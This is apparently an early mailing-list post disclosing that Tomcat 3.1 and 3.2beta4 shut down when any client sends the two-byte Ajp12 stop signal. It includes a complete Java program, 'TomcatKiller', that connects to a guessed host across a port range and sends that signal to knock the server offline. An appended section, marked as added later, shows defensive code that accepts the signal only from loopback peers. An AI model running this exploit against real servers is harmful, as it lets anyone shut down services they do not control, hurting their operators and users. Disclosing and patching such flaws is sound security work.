Hi all, just a word of warning about Tomcat 3.1 and from what I can
tell, 3.2beta4. Looking at the source code, if you're using Ajp12 for
the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
batch/shell file does its job by sending "exit please" bytes to
Tomcat. It doesn't take much to spoof this, here's my TomcatKiller
class below. Just guess a host and port which may have Tomcat
running, and over it goes...
I patched the sources so hopefully it won't happen to me ;)

import java.net.*;
import java.io.*;

public class TomcatKiller {
    static public void main( String[] args ) {
        final byte SIGNAL = (byte)254;
        final byte BYEBYE = (byte)15;
        byte[] msg = { SIGNAL, BYEBYE };
        int min = 8007, max = 8007;
        String host = args[0];
        try {
            if( args.length > 1 )
                min = max = Integer.parseInt( args[1] );
            if( args.length > 2 )
                max = Integer.parseInt( args[2] );
            if( min > max ) {
                int tmp = min;
                min = max;
                max = tmp;
            }
            for( int i = min; i <= max; i++ ) {
                try {
                    Socket s = new Socket( host, i );
                    OutputStream os = s.getOutputStream();
                    os.write( msg );
                    os.flush();
                    break;
                } catch( ConnectException ce ) {
                    System.err.println( "conn refused " + i );
                } catch( IOException ioe ) {
                    ioe.printStackTrace();
                    break;
                }
            }
        } catch( Exception e ) {
            e.printStackTrace();
            System.exit( 1 );
        }
    }
}
// eof

stu
--
Stuart Maclean, Research Associate
University of Washington
ITS Research Program, College of Engineering
Box 352500
Seattle, WA 98195-2500
Tel: (206) 543-0637
http://www.its.washington.edu
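
Added example, not part of the original post and not Tomcat's code or the author's patch: one way a connector could gate the two-byte shutdown signal on the peer address. The class name, the Verdict enum and the loopback-only policy are assumptions made for illustration; the byte values are the ones given in the post.

```java
import java.net.InetAddress;
import java.net.UnknownHostException;

// Hypothetical guard: classify the first bytes read from a connection and
// decide whether a shutdown request from this peer should be honoured.
public class Ajp12ShutdownGuard {
    // Signal bytes as given in the post above.
    static final byte SIGNAL = (byte) 254;
    static final byte BYEBYE = (byte) 15;

    enum Verdict { NOT_SHUTDOWN, ALLOW_SHUTDOWN, REJECT_SHUTDOWN }

    // True when the buffer starts with the two-byte shutdown request.
    static boolean isShutdownSignal(byte[] buf, int len) {
        return buf != null && len >= 2 && buf.length >= 2
                && buf[0] == SIGNAL && buf[1] == BYEBYE;
    }

    // Assumed policy: only a peer on the loopback interface may stop the server.
    static Verdict check(InetAddress peer, byte[] buf, int len) {
        if (!isShutdownSignal(buf, len)) {
            return Verdict.NOT_SHUTDOWN;
        }
        if (peer.isLoopbackAddress()) {
            return Verdict.ALLOW_SHUTDOWN;
        }
        // Leave a trace for whoever reads the logs; the request is dropped.
        System.err.println("rejected shutdown signal from " + peer.getHostAddress());
        return Verdict.REJECT_SHUTDOWN;
    }

    public static void main(String[] args) throws UnknownHostException {
        byte[] stop = { SIGNAL, BYEBYE };
        byte[] other = { 1, 0 }; // constructed bytes that are not the shutdown pair
        // Constructed peers: loopback, and a documentation-range address (192.0.2.0/24).
        InetAddress local = InetAddress.getByAddress(new byte[] { 127, 0, 0, 1 });
        InetAddress remote = InetAddress.getByAddress(new byte[] { (byte) 192, 0, 2, 10 });

        System.out.println("local  + stop  -> " + check(local, stop, stop.length));
        System.out.println("remote + stop  -> " + check(remote, stop, stop.length));
        System.out.println("remote + other -> " + check(remote, other, other.length));
    }
}
```

A loopback-only rule still lets any local user on the host send the signal, so it narrows exposure rather than authenticating the request.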